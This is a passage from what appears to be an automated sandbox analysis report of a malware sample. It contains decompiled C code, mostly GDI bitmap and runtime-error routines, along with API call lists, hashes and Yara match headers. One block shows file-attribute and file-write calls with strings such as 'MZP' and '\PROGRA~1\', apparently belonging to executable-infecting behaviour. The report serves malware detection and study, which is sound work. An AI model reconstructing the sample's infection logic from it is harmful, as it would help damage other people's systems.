                                                            • Opcode Fuzzy Hash: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                            • Instruction Fuzzy Hash: F4F06D31A04309EFEB15DFA1CC51ADEF779FB84714F508576A510675C1D7B82604C758
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LocalTime
                                                            • String ID:
                                                            • API String ID: 481472006-0
                                                            • Opcode ID: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                            • Instruction ID: 4be9079c8441ee73391fb420eaf64c5b500e0d105d5474b8364197a0399cc555
                                                            • Opcode Fuzzy Hash: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                            • Instruction Fuzzy Hash: 23C08C3980450652C600BB64DC0284AB6A8AEC0200F8089BEA4CCD21E1EB39D31DC3C7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0040627C(void* __eax, void* __ebp, void* __eflags) {
                                                            				struct HDC__* _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				struct HDC__* _v44;
                                                            				struct HDC__* _v60;
                                                            				struct HDC__* _v68;
                                                            				struct HDC__* _v72;
                                                            				void* _t59;
                                                            				struct HBITMAP__* _t62;
                                                            				void* _t68;
                                                            				void* _t71;
                                                            				int _t72;
                                                            				int _t75;
                                                            				int _t80;
                                                            				void* _t81;
                                                            				void* _t85;
                                                            				void* _t94;
                                                            				void* _t100;
                                                            				void* _t114;
                                                            				struct HDC__* _t116;
                                                            				struct HDC__* _t119;
                                                            				signed int _t121;
                                                            				struct HBITMAP__* _t124;
                                                            				struct HBITMAP__* _t125;
                                                            				RECT* _t126;
                                                            				void* _t128;
                                                            
                                                            				_t128 = __eflags;
                                                            				_push(__eax);
                                                            				E00406144(__eax);
                                                            				_pop(_t59);
                                                            				if(_t128 != 0) {
                                                            					asm("pushad");
                                                            					_t100 = _t59;
                                                            					 *((intOrPtr*)(_t100 + 0x34))();
                                                            					 *((intOrPtr*)(_t100 + 0x28)) = 0;
                                                            					 *((intOrPtr*)(_t100 + 0x56)) = 0;
                                                            					 *((intOrPtr*)(_t100 + 0x5a)) = 0;
                                                            					asm("jecxz 0x13");
                                                            					_t62 =  *(_t100 + 0x3d);
                                                            					_t121 =  *(_t62 + 4);
                                                            					_t119 =  *(_t62 + 8);
                                                            					if(_t119 < 0) {
                                                            						_t119 =  ~_t119;
                                                            					}
                                                            					_push(0);
                                                            					L00404108();
                                                            					_push(_t62);
                                                            					_t130 =  *((char*)(_t100 + 0x3c)) - 1;
                                                            					if( *((char*)(_t100 + 0x3c)) != 1) {
                                                            						asm("jecxz 0xfffffff2");
                                                            						_t124 = 0;
                                                            						_t110 =  *(_t100 + 0x18);
                                                            						_push(E00405F70( *((intOrPtr*)(_t100 + 0x1c)),  *((intOrPtr*)(( *(_t100 + 0x49) & 0x000000ff) + 0x409188)),  *(_t100 + 0x18)));
                                                            						__eflags =  *(_t100 + 0x49) - 5;
                                                            						if( *(_t100 + 0x49) == 5) {
                                                            							E0040600C(_t67, _t110);
                                                            						}
                                                            						_pop(_t68);
                                                            						_push(_t68);
                                                            						_push(E00406268(_t68) *  *(_t100 + 0x18));
                                                            						_t71 = E00402448(E00406268(_t68) *  *(_t100 + 0x18));
                                                            						_push(_t71);
                                                            						_push(0);
                                                            						_push(_v12);
                                                            						_push(_t71);
                                                            						_t72 =  *(_t100 + 0x18);
                                                            						__eflags = _t72 - _t119;
                                                            						if(__eflags > 0) {
                                                            							_t72 = _t119;
                                                            						}
                                                            						_t75 = GetDIBits(_v8, E00406154(_t100, __eflags), 0, _t72, ??, ??, ??);
                                                            						_t113 =  *(_t100 + 0x18);
                                                            						__eflags = _t113 - _t119;
                                                            						if(_t113 > _t119) {
                                                            							_t113 = _t119;
                                                            						}
                                                            						__eflags = _t75 - _t113;
                                                            						if(__eflags != 0) {
                                                            							_pop(_t81);
                                                            							E00402468(_t81);
                                                            							_push(0);
                                                            							_push(0);
                                                            							_push(0);
                                                            							_push(_t126);
                                                            							_push(0);
                                                            							_push(_v40);
                                                            							_push(_v36);
                                                            							L00404110();
                                                            							_t121 = _t121 ^ 0xffffffff;
                                                            							_t124 = 0;
                                                            							_t85 = SelectObject(_v60, 0);
                                                            							_t113 = _v68;
                                                            							__eflags = 0;
                                                            							E00406094(_t100, 0, _v68, 0, 0);
                                                            							SelectObject(_v72, _t85);
                                                            						}
                                                            						E00406024(_t100, _t100, _t113, __eflags);
                                                            						_pop( *_t47);
                                                            						_pop( *_t48);
                                                            						_pop( *_t49);
                                                            						 *(_t100 + 0x20) = _t124;
                                                            						__eflags = _t121;
                                                            						 *(_t100 + 0x72) = 0;
                                                            						if(_t121 < 0) {
                                                            							_t52 = _t100 + 0x72;
                                                            							 *_t52 =  *(_t100 + 0x72) + 1;
                                                            							__eflags =  *_t52;
                                                            						}
                                                            					} else {
                                                            						_push(0);
                                                            						L00404178();
                                                            						_push(_t62);
                                                            						_push( *(_t100 + 0x18));
                                                            						_push( *((intOrPtr*)(_t100 + 0x1c)));
                                                            						_push(_t62);
                                                            						L00404100();
                                                            						_t125 = _t62;
                                                            						L00404190();
                                                            						_t116 = 0;
                                                            						_push(_t116);
                                                            						_push(SelectObject(_t116, _t125));
                                                            						_push( *(_t100 + 0x18));
                                                            						_push( *((intOrPtr*)(_t100 + 0x1c)));
                                                            						_push(0);
                                                            						_t94 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t100 + 0x2c))));
                                                            						_t117 = _t126;
                                                            						FillRect(_v44, _t126, _t94);
                                                            						DeleteObject(_t94);
                                                            						asm("jecxz 0x24");
                                                            						SelectObject(_v60, 0);
                                                            						SetDIBits(_v68, _t125, 0,  *(_t100 + 0x18),  *(_t100 + 0x41),  *(_t100 + 0x3d), 0);
                                                            						E00406024(_t100, _t100, _t117, _t130);
                                                            						 *(_t100 + 0x20) = _t125;
                                                            					}
                                                            					asm("jecxz 0xa");
                                                            					_pop(_t114);
                                                            					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x4a))))(_t114);
                                                            					_t80 = DeleteDC(_t119);
                                                            					asm("popad");
                                                            					return _t80;
                                                            				}
                                                            				return _t59;
                                                            			}
                                                            0x0040627c
                                                            0x0040627c
                                                            0x0040627d
                                                            0x00406282
                                                            0x00406283
                                                            0x00406289
                                                            0x0040628a
                                                            0x0040628c
                                                            0x00406291
                                                            0x00406294
                                                            0x00406297
                                                            0x004062a3
                                                            0x004062a5
                                                            0x004062a8
                                                            0x004062ab
                                                            0x004062b0
                                                            0x004062b2
                                                            0x004062b2
                                                            0x004062d5
                                                            0x004062d7
                                                            0x004062dc
                                                            0x004062dd
                                                            0x004062e1
                                                            0x00406397
                                                            0x00406399
                                                            0x0040639e
                                                            0x004063a6
                                                            0x004063a7
                                                            0x004063ab
                                                            0x004063ad
                                                            0x004063ad
                                                            0x004063b2
                                                            0x004063b3
                                                            0x004063be
                                                            0x004063bf
                                                            0x004063c4
                                                            0x004063c5
                                                            0x004063c7
                                                            0x004063cb
                                                            0x004063cc
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063e4
                                                            0x004063e9
                                                            0x004063ec
                                                            0x004063ee
                                                            0x004063f0
                                                            0x004063f0
                                                            0x004063f2
                                                            0x004063f4
                                                            0x004063f6
                                                            0x004063f7
                                                            0x004063fe
                                                            0x00406405
                                                            0x00406406
                                                            0x00406407
                                                            0x00406408
                                                            0x0040640a
                                                            0x0040640b
                                                            0x0040640f
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641d
                                                            0x00406423
                                                            0x00406427
                                                            0x0040642c
                                                            0x00406435
                                                            0x00406435
                                                            0x0040643c
                                                            0x00406441
                                                            0x00406444
                                                            0x00406447
                                                            0x0040644a
                                                            0x0040644d
                                                            0x0040644f
                                                            0x00406453
                                                            0x00406455
                                                            0x00406455
                                                            0x00406455
                                                            0x00406455
                                                            0x004062e7
                                                            0x004062e7
                                                            0x004062e9
                                                            0x004062ee
                                                            0x004062ef
                                                            0x004062f2
                                                            0x004062f5
                                                            0x004062f6
                                                            0x004062fb
                                                            0x004062fe
                                                            0x00406303
                                                            0x00406304
                                                            0x0040630c
                                                            0x0040630d
                                                            0x00406310
                                                            0x00406313
                                                            0x00406320
                                                            0x00406325
                                                            0x0040632e
                                                            0x00406333
                                                            0x0040633e
                                                            0x00406344
                                                            0x0040635b
                                                            0x00406378
                                                            0x0040637d
                                                            0x0040637d
                                                            0x0040645b
                                                            0x0040645d
                                                            0x00406463
                                                            0x00406465
                                                            0x0040646a
                                                            0x00000000
                                                            0x0040646a
                                                            0x0040646b

                                                            APIs
                                                            • GetObjectA.GDI32(?,00000018), ref: 004062C2
                                                            • 72E7A590.GDI32(00000000,?,00000000,?,00000000), ref: 004062D7
                                                            • 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 004062E9
                                                            • 72E7A520.GDI32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062F6
                                                            • 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004062FE
                                                            • SelectObject.GDI32(00000000), ref: 00406307
                                                            • CreateSolidBrush.GDI32(00000000), ref: 00406320
                                                            • FillRect.USER32 ref: 0040632E
                                                            • DeleteObject.GDI32(?), ref: 00406333
                                                            • SelectObject.GDI32(?), ref: 00406344
                                                            • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
                                                            • SelectObject.GDI32(00000000,?), ref: 00406371
                                                            • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
                                                            • 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 0040640F
                                                            • SelectObject.GDI32(?,00000000), ref: 0040641D
                                                            • SelectObject.GDI32(?,00000000), ref: 00406435
                                                            • DeleteDC.GDI32 ref: 00406465
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                            • String ID:
                                                            • API String ID: 2504469172-0
                                                            • Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                            • Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
                                                            • Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                            • Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetObjectA.GDI32(?,00000018), ref: 0040FD5A
                                                            • 72E7A590.GDI32(00000000), ref: 0040FD6F
                                                            • 72E7AC50.USER32(00000000,00000000,00000000), ref: 0040FD81
                                                            • 72E7A520.GDI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD8E
                                                            • 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD96
                                                            • SelectObject.GDI32(00000000), ref: 0040FD9F
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0040FDB8
                                                            • FillRect.USER32 ref: 0040FDC6
                                                            • DeleteObject.GDI32(?), ref: 0040FDCB
                                                            • SelectObject.GDI32(?), ref: 0040FDDC
                                                            • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040FDF3
                                                            • SelectObject.GDI32(?), ref: 0040FE09
                                                            • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040FE7C
                                                            • 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040FEA7
                                                            • SelectObject.GDI32(?,00000000), ref: 0040FEB5
                                                            • SelectObject.GDI32(?,00000000), ref: 0040FECD
                                                            • DeleteDC.GDI32(00000000), ref: 0040FEFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                            • String ID:
                                                            • API String ID: 2504469172-0
                                                            • Opcode ID: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                            • Instruction ID: 8bfa987d25260d88ee3329e71298cc77801f48d1f8f03ee880f1b7424a85638e
                                                            • Opcode Fuzzy Hash: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                            • Instruction Fuzzy Hash: A051D4716042006FDB14AF65CC82F2B3B69EF84314F1148BEB905BB6D7D639EC088B98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 57%
                                                            			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
                                                            				struct HDC__* _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				struct HDC__* _v44;
                                                            				struct HDC__* _v60;
                                                            				struct HDC__* _v68;
                                                            				struct HDC__* _v72;
                                                            				void* __ebx;
                                                            				void* _t64;
                                                            				void* _t66;
                                                            				struct HBITMAP__* _t69;
                                                            				void* _t75;
                                                            				void* _t78;
                                                            				int _t79;
                                                            				int _t82;
                                                            				int _t87;
                                                            				void* _t88;
                                                            				void* _t92;
                                                            				void* _t101;
                                                            				void* _t108;
                                                            				void* _t111;
                                                            				void* _t113;
                                                            				void* _t115;
                                                            				void* _t133;
                                                            				struct HDC__* _t135;
                                                            				struct HDC__* _t137;
                                                            				void* _t139;
                                                            				int* _t140;
                                                            				struct HDC__* _t142;
                                                            				signed int _t144;
                                                            				struct HBITMAP__* _t147;
                                                            				struct HBITMAP__* _t148;
                                                            				RECT* _t149;
                                                            				void* _t151;
                                                            
                                                            				_t151 = __eflags;
                                                            				_t113 = __eax;
                                                            				_t64 = E00406144(__eax);
                                                            				if(_t151 == 0) {
                                                            					L7:
                                                            					if(__eflags != 0) {
                                                            						E00406144(_t64);
                                                            						_t66 = _t64;
                                                            						if(__eflags != 0) {
                                                            							asm("pushad");
                                                            							_t115 = _t66;
                                                            							 *((intOrPtr*)(_t115 + 0x34))();
                                                            							 *((intOrPtr*)(_t115 + 0x28)) = 0;
                                                            							 *((intOrPtr*)(_t115 + 0x56)) = 0;
                                                            							 *((intOrPtr*)(_t115 + 0x5a)) = 0;
                                                            							asm("jecxz 0x13");
                                                            							_t69 =  *(_t115 + 0x3d);
                                                            							_t144 =  *(_t69 + 4);
                                                            							_t142 =  *(_t69 + 8);
                                                            							__eflags = _t142;
                                                            							if(_t142 < 0) {
                                                            								_t142 =  ~_t142;
                                                            							}
                                                            							_push(0);
                                                            							L00404108();
                                                            							_push(_t69);
                                                            							__eflags =  *((char*)(_t115 + 0x3c)) - 1;
                                                            							if( *((char*)(_t115 + 0x3c)) != 1) {
                                                            								asm("jecxz 0xfffffff2");
                                                            								_t147 = 0;
                                                            								_t129 =  *(_t115 + 0x18);
                                                            								_push(E00405F70( *((intOrPtr*)(_t115 + 0x1c)),  *((intOrPtr*)(( *(_t115 + 0x49) & 0x000000ff) + 0x409188)),  *(_t115 + 0x18)));
                                                            								__eflags =  *(_t115 + 0x49) - 5;
                                                            								if( *(_t115 + 0x49) == 5) {
                                                            									E0040600C(_t74, _t129);
                                                            								}
                                                            								_pop(_t75);
                                                            								_push(_t75);
                                                            								_push(E00406268(_t75) *  *(_t115 + 0x18));
                                                            								_t78 = E00402448(E00406268(_t75) *  *(_t115 + 0x18));
                                                            								_push(_t78);
                                                            								_push(0);
                                                            								_push(_v12);
                                                            								_push(_t78);
                                                            								_t79 =  *(_t115 + 0x18);
                                                            								__eflags = _t79 - _t142;
                                                            								if(__eflags > 0) {
                                                            									_t79 = _t142;
                                                            								}
                                                            								_t82 = GetDIBits(_v8, E00406154(_t115, __eflags), 0, _t79, ??, ??, ??);
                                                            								_t132 =  *(_t115 + 0x18);
                                                            								__eflags = _t132 - _t142;
                                                            								if(_t132 > _t142) {
                                                            									_t132 = _t142;
                                                            								}
                                                            								__eflags = _t82 - _t132;
                                                            								if(__eflags != 0) {
                                                            									_pop(_t88);
                                                            									E00402468(_t88);
                                                            									_push(0);
                                                            									_push(0);
                                                            									_push(0);
                                                            									_push(_t149);
                                                            									_push(0);
                                                            									_push(_v40);
                                                            									_push(_v36);
                                                            									L00404110();
                                                            									_t144 = _t144 ^ 0xffffffff;
                                                            									_t147 = 0;
                                                            									_t92 = SelectObject(_v60, 0);
                                                            									_t132 = _v68;
                                                            									__eflags = 0;
                                                            									E00406094(_t115, 0, _v68, 0, 0);
                                                            									SelectObject(_v72, _t92);
                                                            								}
                                                            								E00406024(_t115, _t115, _t132, __eflags);
                                                            								_pop( *_t51);
                                                            								_pop( *_t52);
                                                            								_pop( *_t53);
                                                            								 *(_t115 + 0x20) = _t147;
                                                            								__eflags = _t144;
                                                            								 *(_t115 + 0x72) = 0;
                                                            								if(_t144 < 0) {
                                                            									_t56 = _t115 + 0x72;
                                                            									 *_t56 =  &( *(_t115 + 0x72)->i);
                                                            									__eflags =  *_t56;
                                                            								}
                                                            								goto L25;
                                                            							} else {
                                                            								_push(0);
                                                            								L00404178();
                                                            								_push(_t69);
                                                            								_push( *(_t115 + 0x18));
                                                            								_push( *((intOrPtr*)(_t115 + 0x1c)));
                                                            								_push(_t69);
                                                            								L00404100();
                                                            								_t148 = _t69;
                                                            								L00404190();
                                                            								_t135 = 0;
                                                            								_push(_t135);
                                                            								_push(SelectObject(_t135, _t148));
                                                            								_push( *(_t115 + 0x18));
                                                            								_push( *((intOrPtr*)(_t115 + 0x1c)));
                                                            								_push(0);
                                                            								_t101 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t115 + 0x2c))));
                                                            								_t136 = _t149;
                                                            								FillRect(_v44, _t149, _t101);
                                                            								DeleteObject(_t101);
                                                            								asm("jecxz 0x24");
                                                            								SelectObject(_v60, 0);
                                                            								SetDIBits(_v68, _t148, 0,  *(_t115 + 0x18),  *(_t115 + 0x41),  *(_t115 + 0x3d), 0);
                                                            								E00406024(_t115, _t115, _t136, __eflags);
                                                            								 *(_t115 + 0x20) = _t148;
                                                            								L25:
                                                            								asm("jecxz 0xa");
                                                            								_pop(_t133);
                                                            								 *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x4a))))(_t133);
                                                            								_t87 = DeleteDC(_t142);
                                                            								asm("popad");
                                                            								return _t87;
                                                            							}
                                                            						}
                                                            						return _t66;
                                                            					} else {
                                                            						return _t64;
                                                            					}
                                                            				} else {
                                                            					_push(__edx);
                                                            					_t64 = E0040648C(_t113, __edx);
                                                            					_pop(_t137);
                                                            					if(_t64 == _t137) {
                                                            						goto L7;
                                                            					} else {
                                                            						_t108 = _t113;
                                                            						if(_t137 != 0) {
                                                            							 *(_t113 + 0x49) = _t137;
                                                            							__eflags = _t137 - 5;
                                                            							if(_t137 == 5) {
                                                            								_t137 = _t137 - 1;
                                                            								__eflags = _t137;
                                                            							}
                                                            							L27();
                                                            							_t111 = E00405F98( *( *((intOrPtr*)(_t113 + 0x3d)) + 0xe) & 0x0000ffff, 0);
                                                            							_t139 = _t137;
                                                            							__eflags = _t111 - _t139;
                                                            							_t64 = _t113;
                                                            							goto L7;
                                                            						} else {
                                                            							_t140 =  &(_t137->i);
                                                            							if(_t140 !=  *(_t108 + 0x3c)) {
                                                            								 *(_t108 + 0x3c) = _t140;
                                                            								L9();
                                                            								return _t108;
                                                            							}
                                                            							return _t108;
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            Instruction addresses for the listing above span 0x00406218 to 0x00406489.

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                            • Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
                                                            • Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                            • Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                            • Instruction ID: 4cf276d7622785da586c8009362eb5643f0905aac9be693976ada0e9182b1a0c
                                                            • Opcode Fuzzy Hash: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                            • Instruction Fuzzy Hash: 7E3102706041006FDB24AF65CC82F2A3A6AAF84308F5144BFB901BF6DBC63DDC499758
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00410198
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 004101B7
                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00410221
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00410356
                                                            • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041040F
                                                            • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00410496
                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004101EA
                                                              • Part of subcall function 0040FC78: GetObjectA.GDI32(00000000,00000018), ref: 0040FC8A
                                                              • Part of subcall function 0040FBEC: 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC0F
                                                              • Part of subcall function 0040FBEC: 72E7A7A0.GDI32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC2A
                                                              • Part of subcall function 0040FBEC: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 0040FC35
                                                            • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041052B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$CopyImage$B380
                                                            • String ID: (
                                                            • API String ID: 1117845954-3887548279
                                                            • Opcode ID: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                            • Instruction ID: a4bd64b3fd63d48472c9145484328d1e8b73c1e654bc960fa13628ff834bc38b
                                                            • Opcode Fuzzy Hash: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                            • Instruction Fuzzy Hash: 05E15134E002189BDB20EBA9C885BDEB7B5AF48314F50807BF505F7382DA799D85CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,Function_0000748C), ref: 00410DB0
                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410DC2
                                                              • Part of subcall function 0040E600: CreateFileA.KERNEL32(?,40000400,40000400,00000000,40000400,40000400,00000000,0040E6CC,00000000,Function_00004C66), ref: 0040E620
                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410EF9
                                                              • Part of subcall function 0040E65C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,0040E75F,00000000,Function_00004CE6), ref: 0040E667
                                                              • Part of subcall function 0040E64C: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00410C11,00000000,Function_000071BF), ref: 0040E654
                                                              • Part of subcall function 0040E678: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040E682
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Attributes$CreatePointerReadWrite
                                                            • String ID: M$MZP$Z$\PROGRA~1\
                                                            • API String ID: 997383822-4093836345
                                                            • Opcode ID: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                            • Instruction ID: 2f0480c31d9fc6f6f6bd4ff7e20304d554dec23e4d9677c87e7e87a18c1bd8bd
                                                            • Opcode Fuzzy Hash: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                            • Instruction Fuzzy Hash: B1515570B003089BDB14FB6ECC8269EB3659F55308F5089BBB404B73D2DA7D9E854B59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E,0040BF7B), ref: 0040C9E9
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E), ref: 0040C9EF
                                                            • GetStdHandle.KERNEL32(000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA04
                                                            • WriteFile.KERNEL32(00000000,000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA0A
                                                            • MessageBoxA.USER32 ref: 0040CA28
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileHandleWrite$Message
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 1570097196-2970929446
                                                            • Opcode ID: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                            • Instruction ID: e346e235dea6380484e37d32cf1e26acb754014f59db45d581b47c6c48365cc5
                                                            • Opcode Fuzzy Hash: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                            • Instruction Fuzzy Hash: 58F0CDA0BC430878E620E3A4AE0AF5A221C4348B15F60463FB220741D3C6BC4894C72F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E00402F18(void* __ecx) {
                                                            				long _v4;
                                                            				int _t3;
                                                            
                                                            				if( *0x40a034 == 0) {
                                                            					if( *0x409024 == 0) {
                                                            						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                            					}
                                                            					return _t3;
                                                            				} else {
                                                            					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
                                                            						 *0x40a220();
                                                            					}
